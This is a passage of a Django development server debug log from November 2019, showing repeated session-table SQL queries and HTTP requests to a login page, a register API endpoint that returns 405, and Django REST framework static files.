'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 24, 85941, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:24,119 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:24.117513+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 24, 117513, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:35:24] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-29 07:35:24,365 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:24.357328+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 24, 357328, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:24,390 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:24.388777+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 24, 388777, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:35:24] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-29 07:35:24,556 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:24.548155+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 24, 548155, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:24,592 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:24.590644+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 24, 590644, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:35:24] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-29 07:35:24,874 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:24.864686+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 24, 864686, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:24,902 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:24.900896+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 24, 900896, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:35:24] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-29 07:35:25,115 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:25.106307+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 25, 106307, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:25,148 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:25.146062+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 25, 146062, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:35:25] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-29 07:35:25,303 utils 18694 139696059688704 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:25.289879+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 25, 289879, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:25,337 utils 18694 139696059688704 (0.002) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:25.335054+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 25, 335054, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:35:25] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-29 07:35:25,536 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:25.527315+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 25, 527315, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:25,563 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:25.561590+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 25, 561590, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:35:25] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-29 07:35:26,992 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:26.983107+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 26, 983107, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:27,034 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:27.032011+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 27, 32011, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:35:27] "GET /api/register HTTP/1.0" 405 5703 DEBUG 2019-11-29 07:35:28,473 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:28.464462+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 28, 464462, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:28,502 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:28.500823+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 28, 500823, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:35:28] "GET /api/register HTTP/1.0" 405 5703 DEBUG 2019-11-29 07:35:29,489 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:29.480787+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 29, 480787, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:29,518 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:29.516645+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 29, 516645, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:35:29] "GET /api/register HTTP/1.0" 405 5703 DEBUG 2019-11-29 07:35:30,011 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:30.002847+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 30, 2847, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:30,044 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:30.042210+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 30, 42210, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:35:30] "GET /api/register HTTP/1.0" 405 5703 DEBUG 2019-11-29 07:35:30,468 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:30.459550+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 30, 459550, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:30,498 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:30.496430+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 30, 496430, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:35:30] "GET /api/register HTTP/1.0" 405 5703 DEBUG 2019-11-29 07:35:30,773 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:30.761470+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 30, 761470, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:30,809 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:30.807475+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 30, 807475, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:35:30] "GET /api/register HTTP/1.0" 405 5703 DEBUG 2019-11-29 07:35:31,094 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:31.067143+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 31, 67143, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:31,136 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:31.134663+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 31, 134663, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:35:31] "GET /api/register HTTP/1.0" 405 5703 DEBUG 2019-11-29 07:35:31,167 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:31.155883+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 31, 155883, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:31,202 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:31.199786+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 31, 199786, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:35:31] "GET /api/register HTTP/1.0" 405 5703 DEBUG 2019-11-29 07:35:31,546 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:31.537641+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 31, 537641, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:31,576 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:31.574761+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 31, 574761, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:35:31] "GET /api/register HTTP/1.0" 405 5703 DEBUG 2019-11-29 07:35:31,710 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:35:31.699822+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 35, 31, 699822, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:35:31,740 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:35:31.738173+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 35, 31, 738173, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:35:31] "GET /api/register HTTP/1.0" 405 5703 DEBUG 2019-11-29 07:36:44,147 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:36:44.134301+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 36, 44, 134301, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:36:44,195 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:36:44.192534+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 36, 44, 192534, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:36:44] "GET /api/register HTTP/1.0" 405 5703 DEBUG 2019-11-29 07:36:45,711 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:36:45.700661+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 36, 45, 700661, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:36:45,756 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:36:45.753895+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 36, 45, 753895, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:36:45] "GET /api/register HTTP/1.0" 405 5703 DEBUG 2019-11-29 07:36:48,586 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:36:48.576244+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 36, 48, 576244, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:36:48,622 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:36:48.619577+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 36, 48, 619577, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:36:48] "GET /api/register HTTP/1.0" 405 5703 DEBUG 2019-11-29 07:36:48,874 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:36:48.865484+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 36, 48, 865484, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:36:48,903 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:36:48.901730+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 36, 48, 901730, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:36:48] "GET /api/register HTTP/1.0" 405 5703 DEBUG 2019-11-29 07:36:49,144 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:36:49.135335+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 36, 49, 135335, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 07:36:49,175 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T07:36:49.172857+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 7, 36, 49, 172857, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [29/Nov/2019 07:36:49] "GET /api/register HTTP/1.0" 405 5703 [29/Nov/2019 07:36:49] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.0" 200 3385 [29/Nov/2019 07:36:49] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.0" 200 121457 [29/Nov/2019 07:36:49] "GET /static/rest_framework/css/prettify.css HTTP/1.0" 200 817 [29/Nov/2019 07:36:49] "GET /static/rest_framework/css/default.css HTTP/1.0" 200 1131 [29/Nov/2019 07:36:49] "GET /static/rest_framework/js/jquery-3.4.1.min.js HTTP/1.0" 200 88145 [29/Nov/2019 07:36:49] "GET /static/rest_framework/js/ajax-form.js HTTP/1.0" 200 3597 [29/Nov/2019 07:36:49] "GET /static/rest_framework/js/csrf.js HTTP/1.0" 200 1719 [29/Nov/2019 07:36:49] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.0" 200 37608 [29/Nov/2019 07:36:49] "GET /static/rest_framework/js/prettify-min.js HTTP/1.0" 200 13632 [29/Nov/2019 07:36:50] "GET /static/rest_framework/js/default.js HTTP/1.0" 200 1268 [29/Nov/2019 07:36:50] "GET /static/rest_framework/img/grid.png HTTP/1.0" 200 1458 Not Found: /favicon.ico [29/Nov/2019 07:36:51] "GET /favicon.ico HTTP/1.0" 404 6411 DEBUG 2019-11-29 07:37:05,231 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:37:05.221849+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 7, 37, 5, 221849, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 07:37:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 07:37:05,532 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T07:37:05.519747+00:00'::timestamptz AND 